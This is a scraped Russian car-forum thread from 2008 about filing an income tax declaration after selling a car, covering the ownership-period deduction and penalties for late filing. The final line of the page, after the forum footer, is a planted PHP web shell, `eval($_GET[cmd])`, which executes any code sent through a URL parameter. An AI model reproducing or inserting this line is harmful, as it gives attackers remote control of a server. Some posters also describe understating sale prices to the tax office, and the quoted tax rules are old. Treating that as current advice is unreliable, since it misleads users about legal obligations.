+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 35

Тема: Декларация на НДФЛ в связи с продажей ТС


  1. #1
    Мимо проходил kauperwood is on a distinguished road Аватар для kauperwood
    Регистрация
    29.02.2008
    Сообщений
    10
    Всем здравствуйте. получил письмо из налоговой, в котором сообщается. что я должен предоставить декларацию в связи с реализацией транспортных средств. Естественно, при продаже стоимость автомобиля указывалась порядка 100-120 тыс. руб. кто сталкивался с такой ситуацией отсоветуйтесь... спасибо

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(kauperwood &#064; Mar 2 2008, 19&#58;03) <{POST_SNAPBACK}></div><div class='quotemain'>Всем здравствуйте. получил письмо из налоговой, в котором сообщается. что я должен предоставить декларацию в связи с реализацией транспортных средств. Естественно, при продаже стоимость автомобиля указывалась порядка 100-120 тыс. руб. кто сталкивался с такой ситуацией отсоветуйтесь... спасибо[/b][/quote]

    если пришло письмо из налоговой, то это уже по факту ее не подачи. Есть шанс без последствий, заполнить ее и подать в налоговую. Это вроде как жест доброй воли со стороны налоговой. В случае неподачи, они уже не отстанут и выставят штраф. Уплата штрафа не отменяет ее подачу все равно. Если я точно помню, то декларация подается по форме утвержденной к тому году, ща который нужно отчитаться.
    к декларации хорошо бы приложить копию справки счет.
    Если самому заполнять не получается, а там есть свои интересные замуты, то поисщи у меня приятель платил небольшие денужки и ему аудиторская контора ее заполнила и он отнес.

    вот почитать и формы НДФЛ

    http://www.nalog.ru/document.php?id=13594&...topic=decl_2004

    http://www.nalog.ru/document.php?id=26227&topic=fl_form
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    Мимо проходил kauperwood is on a distinguished road Аватар для kauperwood
    Регистрация
    29.02.2008
    Сообщений
    10
    вот почитать и формы НДФЛ

    Спасибо, еще интересует проверяют ли они как то факт занижения стоимости, я не видел еще ни одного человека, который бв указывал реальную стоимость авто

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(kauperwood &#064; Mar 2 2008, 20&#58;12) <{POST_SNAPBACK}></div><div class='quotemain'>вот почитать и формы НДФЛ

    Спасибо, еще интересует проверяют ли они как то факт занижения стоимости, я не видел еще ни одного человека, который бв указывал реальную стоимость авто[/b][/quote]


    Они проверяют, то что было при сделке, т.е. та сумма которая фигурирует в ГАИ. Они не проверяют почему дешево или дорого, это право граждан продавать за сколько им нужно.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    GTI-Racing Димон is on a distinguished road Аватар для Димон
    Регистрация
    15.08.2006
    Откуда
    г.Москва СВАО
    Машина
    Skoda Octavia RS
    Сообщений
    432
    А что бы небыло притензий от налоговой какую стоимость надо указывать в справке-счёт???? до 90тр ??
    Был у меня Golf III ...был Golf IV....теперь Skoda Octavia RS (сердцем я с вами) ..... что дальше?

  6. #6
    Новичок BzzzzzIK is on a distinguished road Аватар для BzzzzzIK
    Регистрация
    30.11.2006
    Сообщений
    138
    по закону они должны быть - их не будут если они о тебе забудут )) у некоторых инспекций такой разброд в личных счетах что ппц )) а так не важно какая стоимость - ты продал - заплати налог ) исключение только если ты продал авто которым владел более трех лет - тогда платить не надо ниче .. там налоговый вычет работает в размере стоимости полученного

  7. #7
    GTI-Racing ARS is on a distinguished road Аватар для ARS
    Регистрация
    29.05.2006
    Сообщений
    436
    <div class='quotetop'>Цитата(Bzzzzz&#39;Z &#064; Mar 2 2008, 22&#58;45) <{POST_SNAPBACK}></div><div class='quotemain'>по закону они должны быть - их не будут если они о тебе забудут )) у некоторых инспекций такой разброд в личных счетах что ппц )) а так не важно какая стоимость - ты продал - заплати налог ) исключение только если ты продал авто которым владел более трех лет - тогда платить не надо ниче .. там налоговый вычет работает в размере стоимости полученного[/b][/quote]
    Не только. Если цена сделки не превышает не то 100, не то 150 тыс. рублей, то не будешь налог платить.
    2.8 4motion BBG

  8. #8
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    125 тыщ. налоговый вычет, один раз в год даетца на авто. Но нужно приложить формальное заявление к декларации с просьбой предоставить такой вычет в любом случае или на 125 тыщ. или на всб сумму.
    до трех лет владение:
    1) купил и продал. За минусом 125 тыщ. руб. с оставшейся суммы нужно уплатить 13%. При этом обязательным является подтверждение по чем покупал и почем продавал.

    больше трех лет владел:
    1) купил и продал. Подтверждать по чем покупал и почем продавал не надо. Льгота (вычет в размере) всей суммы.

    Все это имеет место быть, если покупал дороже, а продавал дешевле. В противном случае, даже во втором случае, нужно будет уплатить налого, но ссумы превышающей покупку. Т.е. как будто бы получил доход.

    вот выдержка из НГ:
    ст. 220 п.1 "в суммах, полученных налогоплательщиком в налоговом периоде от продажи жилых домов, квартир, комнат, включая приватизированные жилые помещения, дач, садовых домиков или земельных участков и долей в указанном имуществе, находившихся в собственности налогоплательщика менее трех лет, но не превышающих в целом 1 000 000 рублей, а также в суммах, полученных в налоговом периоде от продажи иного имущества, находившегося в собственности налогоплательщика менее трех лет, но не превышающих 125 000 рублей. При продаже жилых домов, квартир, комнат, включая приватизированные жилые помещения, дач, садовых домиков и земельных участков и долей в указанном имуществе, находившихся в собственности налогоплательщика три года и более, а также при продаже иного имущества, находившегося в собственности налогоплательщика три года и более, имущественный налоговый вычет предоставляется в сумме, полученной налогоплательщиком при продаже указанного имущества."
    песок сыпется....не останавливайтесь на достигнутом !

  9. #9
    Администратор 3BEPb is on a distinguished road Аватар для 3BEPb
    Регистрация
    03.03.2006
    Машина
    Audi A4
    Сообщений
    1,731
    вот скажите что мне грозит...
    я два года назад продал машину. через год примерно пришел пустой бланк из налоговой с просьбой явится в налоговую и всё им рассказать, без адресов телефонов и контактных лиц. я на эту бумажку забил)) до этого после продажи машин ни каких бумажек от налоговой не видел. в справке счёта всегда указывал менее 125 тысяч рублей.
    насколько я понял получил ты доход или нет, продал ли машину после 3х лет собственности или нет, пофигу&#33; в налоговую идти всё равно надо было...
    чё делать ??? и что мне грозит )))

    PS кстати после это был в налоговой. получал ИНН. проблем не было

  10. #10
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(3BEPb &#064; Mar 5 2008, 13&#58;45) <{POST_SNAPBACK}></div><div class='quotemain'>вот скажите что мне грозит...
    я два года назад продал машину. через год примерно пришел пустой бланк из налоговой с просьбой явится в налоговую и всё им рассказать, без адресов телефонов и контактных лиц. я на эту бумажку забил)) до этого после продажи машин ни каких бумажек от налоговой не видел. в справке счёта всегда указывал менее 125 тысяч рублей.
    насколько я понял получил ты доход или нет, продал ли машину после 3х лет собственности или нет, пофигу&#33; в налоговую идти всё равно надо было...
    чё делать ??? и что мне грозит )))

    PS кстати после это был в налоговой. получал ИНН. проблем не было [/b][/quote]

    Есть срок, в течении 3-лет (вероятно с момента окончания последнего срока подажи декларации т.е. 1-апреля года следующего за годом продажи) налоговая может вынести постановление о наложени штрафа.
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 1 из 4 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Услуги Связи (Юр. Лицам)
    от TishONE в разделе Бизнес
    Ответов: 18
    Последнее сообщение: 01.05.2023, 13:09
  2. Ответов: 16
    Последнее сообщение: 29.08.2014, 20:37
  3. В связи с апгрейдом продам
    от Wilfrid Maximus в разделе Барахолка
    Ответов: 8
    Последнее сообщение: 03.05.2010, 13:34
  4. Вы подавали деклрацию в налоговую инспекцию в связи с продажей ТС?
    от 3BEPb в разделе Законодательство и страхование
    Ответов: 5
    Последнее сообщение: 08.03.2008, 23:39

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}